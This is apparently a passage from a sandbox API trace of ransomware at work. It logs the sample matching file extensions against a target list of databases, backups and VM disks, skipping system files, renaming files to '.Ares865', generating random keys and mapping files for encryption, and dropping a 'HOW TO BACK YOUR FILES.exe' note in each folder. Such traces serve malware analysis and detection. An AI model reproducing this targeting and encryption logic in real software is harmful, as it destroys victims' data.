[0091.927] lstrlenW (lpString="nv") returned 2 [0091.927] lstrcmpiW (lpString1="lv", lpString2="nv") returned -1 [0091.927] lstrlenW (lpString="nv2") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="nv2") returned -1 [0091.927] lstrlenW (lpString="nwdb") returned 4 [0091.927] lstrcmpiW (lpString1=".flv", lpString2="nwdb") returned -1 [0091.927] lstrlenW (lpString="nyf") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="nyf") returned -1 [0091.927] lstrlenW (lpString="odb") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="odb") returned -1 [0091.927] lstrlenW (lpString="odb") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="odb") returned -1 [0091.927] lstrlenW (lpString="oqy") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="oqy") returned -1 [0091.927] lstrlenW (lpString="ora") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="ora") returned -1 [0091.927] lstrlenW (lpString="orx") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="orx") returned -1 [0091.927] lstrlenW (lpString="owc") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="owc") returned -1 [0091.927] lstrlenW (lpString="p96") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="p96") returned -1 [0091.927] lstrlenW (lpString="p97") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="p97") returned -1 [0091.927] lstrlenW (lpString="pan") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="pan") returned -1 [0091.927] lstrlenW (lpString="pdb") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="pdb") returned -1 [0091.927] lstrlenW (lpString="pdm") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="pdm") returned -1 [0091.927] lstrlenW (lpString="pnz") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="pnz") returned -1 [0091.927] lstrlenW (lpString="qry") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="qry") returned -1 [0091.927] lstrlenW (lpString="qvd") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="qvd") returned -1 [0091.927] lstrlenW (lpString="rbf") returned 3 [0091.927] lstrcmpiW (lpString1="flv", lpString2="rbf") returned -1 [0091.928] lstrlenW (lpString="rctd") returned 4 [0091.928] lstrcmpiW (lpString1=".flv", lpString2="rctd") returned -1 [0091.928] lstrlenW (lpString="rod") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="rod") returned -1 [0091.928] lstrlenW (lpString="rodx") returned 4 [0091.928] lstrcmpiW (lpString1=".flv", lpString2="rodx") returned -1 [0091.928] lstrlenW (lpString="rpd") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="rpd") returned -1 [0091.928] lstrlenW (lpString="rsd") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="rsd") returned -1 [0091.928] lstrlenW (lpString="sas7bdat") returned 8 [0091.928] lstrcmpiW (lpString1="GtdA.flv", lpString2="sas7bdat") returned -1 [0091.928] lstrlenW (lpString="sbf") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="sbf") returned -1 [0091.928] lstrlenW (lpString="scx") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="scx") returned -1 [0091.928] lstrlenW (lpString="sdb") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="sdb") returned -1 [0091.928] lstrlenW (lpString="sdc") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="sdc") returned -1 [0091.928] lstrlenW (lpString="sdf") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="sdf") returned -1 [0091.928] lstrlenW (lpString="sis") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="sis") returned -1 [0091.928] lstrlenW (lpString="spq") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="spq") returned -1 [0091.928] lstrlenW (lpString="te") returned 2 [0091.928] lstrcmpiW (lpString1="lv", lpString2="te") returned -1 [0091.928] lstrlenW (lpString="teacher") returned 7 [0091.928] lstrcmpiW (lpString1="tdA.flv", lpString2="teacher") returned -1 [0091.928] lstrlenW (lpString="tmd") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="tmd") returned -1 [0091.928] lstrlenW (lpString="tps") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="tps") returned -1 [0091.928] lstrlenW (lpString="trc") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="trc") returned -1 [0091.928] lstrlenW (lpString="trc") returned 3 [0091.928] lstrcmpiW (lpString1="flv", lpString2="trc") returned -1 [0091.929] lstrlenW (lpString="trm") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="trm") returned -1 [0091.929] lstrlenW (lpString="udb") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="udb") returned -1 [0091.929] lstrlenW (lpString="udl") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="udl") returned -1 [0091.929] lstrlenW (lpString="usr") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="usr") returned -1 [0091.929] lstrlenW (lpString="v12") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="v12") returned -1 [0091.929] lstrlenW (lpString="vis") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="vis") returned -1 [0091.929] lstrlenW (lpString="vpd") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="vpd") returned -1 [0091.929] lstrlenW (lpString="vvv") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="vvv") returned -1 [0091.929] lstrlenW (lpString="wdb") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="wdb") returned -1 [0091.929] lstrlenW (lpString="wmdb") returned 4 [0091.929] lstrcmpiW (lpString1=".flv", lpString2="wmdb") returned -1 [0091.929] lstrlenW (lpString="wrk") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="wrk") returned -1 [0091.929] lstrlenW (lpString="xdb") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="xdb") returned -1 [0091.929] lstrlenW (lpString="xld") returned 3 [0091.929] lstrcmpiW (lpString1="flv", lpString2="xld") returned -1 [0091.929] lstrlenW (lpString="xmlff") returned 5 [0091.929] lstrcmpiW (lpString1="A.flv", lpString2="xmlff") returned -1 [0091.929] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\MVuwqaGtdA.flv.Ares865") returned 118 [0091.929] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\MVuwqaGtdA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\hhab9kiyb-giuesnbjlx\\mvuwqagtda.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\MVuwqaGtdA.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\hhab9kiyb-giuesnbjlx\\mvuwqagtda.flv.ares865"), dwFlags=0x1) returned 1 [0091.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\MVuwqaGtdA.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\hhab9kiyb-giuesnbjlx\\mvuwqagtda.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.930] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4985) returned 1 [0091.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.930] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.931] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.931] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.931] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1680, lpName=0x0) returned 0x15c [0091.932] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1680) returned 0x190000 [0091.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.933] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.933] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.933] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.933] CloseHandle (hObject=0x15c) returned 1 [0091.933] CloseHandle (hObject=0x118) returned 1 [0091.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.935] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bc6af90, ftCreationTime.dwHighDateTime=0x1d4cb5e, ftLastAccessTime.dwLowDateTime=0x6f3dab90, ftLastAccessTime.dwHighDateTime=0x1d4c55d, ftLastWriteTime.dwLowDateTime=0x6f3dab90, ftLastWriteTime.dwHighDateTime=0x1d4c55d, nFileSizeHigh=0x0, nFileSizeLow=0x1379, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MVuwqaGtdA.flv", cAlternateFileName="MVUWQA~1.FLV")) returned 0 [0091.935] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0091.935] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0091.935] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m" [0091.935] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0091.935] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0091.935] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m") returned 93 [0091.935] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m" [0091.935] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.935] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.935] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.936] GetLastError () returned 0x0 [0091.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.936] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.936] CloseHandle (hObject=0x120) returned 1 [0091.936] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.936] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa430890, ftCreationTime.dwHighDateTime=0x1d4c86c, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.936] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.936] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.936] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.936] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa430890, ftCreationTime.dwHighDateTime=0x1d4c86c, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.936] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.936] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.936] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.936] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.936] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d09faa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.936] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.936] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db9510, ftCreationTime.dwHighDateTime=0x1d4cbe3, ftLastAccessTime.dwLowDateTime=0xa5a2d280, ftLastAccessTime.dwHighDateTime=0x1d4cf7d, ftLastWriteTime.dwLowDateTime=0xa5a2d280, ftLastWriteTime.dwHighDateTime=0x1d4cf7d, nFileSizeHigh=0x0, nFileSizeLow=0xcc49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lD6J_zIG4uGC_KErhHi4.avi", cAlternateFileName="LD6J_Z~1.AVI")) returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="aoldtz.exe") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2=".") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="..") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="windows") returned -1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="bootmgr") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="temp") returned -1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="pagefile.sys") returned -1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="boot") returned 1 [0091.936] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="ids.txt") returned 1 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="ntuser.dat") returned -1 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="perflogs") returned -1 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2="MSBuild") returned -1 [0091.937] lstrlenW (lpString="lD6J_zIG4uGC_KErhHi4.avi") returned 24 [0091.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\*") returned 95 [0091.937] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="lD6J_zIG4uGC_KErhHi4.avi" | out: lpString1="lD6J_zIG4uGC_KErhHi4.avi") returned="lD6J_zIG4uGC_KErhHi4.avi" [0091.937] lstrlenW (lpString="lD6J_zIG4uGC_KErhHi4.avi") returned 24 [0091.937] lstrlenW (lpString="Ares865") returned 7 [0091.937] lstrcmpiW (lpString1="Hi4.avi", lpString2="Ares865") returned 1 [0091.937] lstrlenW (lpString=".dll") returned 4 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2=".dll") returned 1 [0091.937] lstrlenW (lpString=".lnk") returned 4 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2=".lnk") returned 1 [0091.937] lstrlenW (lpString=".ini") returned 4 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2=".ini") returned 1 [0091.937] lstrlenW (lpString=".sys") returned 4 [0091.937] lstrcmpiW (lpString1="lD6J_zIG4uGC_KErhHi4.avi", lpString2=".sys") returned 1 [0091.937] lstrlenW (lpString="lD6J_zIG4uGC_KErhHi4.avi") returned 24 [0091.937] lstrlenW (lpString="bak") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="bak") returned -1 [0091.937] lstrlenW (lpString="ba_") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="ba_") returned -1 [0091.937] lstrlenW (lpString="dbb") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="dbb") returned -1 [0091.937] lstrlenW (lpString="vmdk") returned 4 [0091.937] lstrcmpiW (lpString1=".avi", lpString2="vmdk") returned -1 [0091.937] lstrlenW (lpString="rar") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="rar") returned -1 [0091.937] lstrlenW (lpString="zip") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="zip") returned -1 [0091.937] lstrlenW (lpString="tgz") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="tgz") returned -1 [0091.937] lstrlenW (lpString="vbox") returned 4 [0091.937] lstrcmpiW (lpString1=".avi", lpString2="vbox") returned -1 [0091.937] lstrlenW (lpString="vdi") returned 3 [0091.937] lstrcmpiW (lpString1="avi", lpString2="vdi") returned -1 [0091.937] lstrlenW (lpString="vhd") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="vhd") returned -1 [0091.938] lstrlenW (lpString="vhdx") returned 4 [0091.938] lstrcmpiW (lpString1=".avi", lpString2="vhdx") returned -1 [0091.938] lstrlenW (lpString="avhd") returned 4 [0091.938] lstrcmpiW (lpString1=".avi", lpString2="avhd") returned -1 [0091.938] lstrlenW (lpString="db") returned 2 [0091.938] lstrcmpiW (lpString1="vi", lpString2="db") returned 1 [0091.938] lstrlenW (lpString="db2") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="db2") returned -1 [0091.938] lstrlenW (lpString="db3") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="db3") returned -1 [0091.938] lstrlenW (lpString="dbf") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="dbf") returned -1 [0091.938] lstrlenW (lpString="mdf") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="mdf") returned -1 [0091.938] lstrlenW (lpString="mdb") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="mdb") returned -1 [0091.938] lstrlenW (lpString="sql") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="sql") returned -1 [0091.938] lstrlenW (lpString="sqlite") returned 6 [0091.938] lstrcmpiW (lpString1="i4.avi", lpString2="sqlite") returned -1 [0091.938] lstrlenW (lpString="sqlite3") returned 7 [0091.938] lstrcmpiW (lpString1="Hi4.avi", lpString2="sqlite3") returned -1 [0091.938] lstrlenW (lpString="sqlitedb") returned 8 [0091.938] lstrcmpiW (lpString1="hHi4.avi", lpString2="sqlitedb") returned -1 [0091.938] lstrlenW (lpString="xml") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="xml") returned -1 [0091.938] lstrlenW (lpString="$er") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="$er") returned 1 [0091.938] lstrlenW (lpString="4dd") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="4dd") returned 1 [0091.938] lstrlenW (lpString="4dl") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="4dl") returned 1 [0091.938] lstrlenW (lpString="^^^") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="^^^") returned 1 [0091.938] lstrlenW (lpString="abs") returned 3 [0091.938] lstrcmpiW (lpString1="avi", lpString2="abs") returned 1 [0091.939] lstrlenW (lpString="abx") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="abx") returned 1 [0091.939] lstrlenW (lpString="accdb") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accdb") returned -1 [0091.939] lstrlenW (lpString="accdc") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accdc") returned -1 [0091.939] lstrlenW (lpString="accde") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accde") returned -1 [0091.939] lstrlenW (lpString="accdr") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accdr") returned -1 [0091.939] lstrlenW (lpString="accdt") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accdt") returned -1 [0091.939] lstrlenW (lpString="accdw") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accdw") returned -1 [0091.939] lstrlenW (lpString="accft") returned 5 [0091.939] lstrcmpiW (lpString1="4.avi", lpString2="accft") returned -1 [0091.939] lstrlenW (lpString="adb") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.939] lstrlenW (lpString="adb") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.939] lstrlenW (lpString="ade") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="ade") returned 1 [0091.939] lstrlenW (lpString="adf") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="adf") returned 1 [0091.939] lstrlenW (lpString="adn") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="adn") returned 1 [0091.939] lstrlenW (lpString="adp") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="adp") returned 1 [0091.939] lstrlenW (lpString="alf") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="alf") returned 1 [0091.939] lstrlenW (lpString="ask") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="ask") returned 1 [0091.939] lstrlenW (lpString="btr") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="btr") returned -1 [0091.939] lstrlenW (lpString="cat") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="cat") returned -1 [0091.939] lstrlenW (lpString="cdb") returned 3 [0091.939] lstrcmpiW (lpString1="avi", lpString2="cdb") returned -1 [0091.940] lstrlenW (lpString="ckp") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="ckp") returned -1 [0091.940] lstrlenW (lpString="cma") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="cma") returned -1 [0091.940] lstrlenW (lpString="cpd") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="cpd") returned -1 [0091.940] lstrlenW (lpString="dacpac") returned 6 [0091.940] lstrcmpiW (lpString1="i4.avi", lpString2="dacpac") returned 1 [0091.940] lstrlenW (lpString="dad") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dad") returned -1 [0091.940] lstrlenW (lpString="dadiagrams") returned 10 [0091.940] lstrcmpiW (lpString1="ErhHi4.avi", lpString2="dadiagrams") returned 1 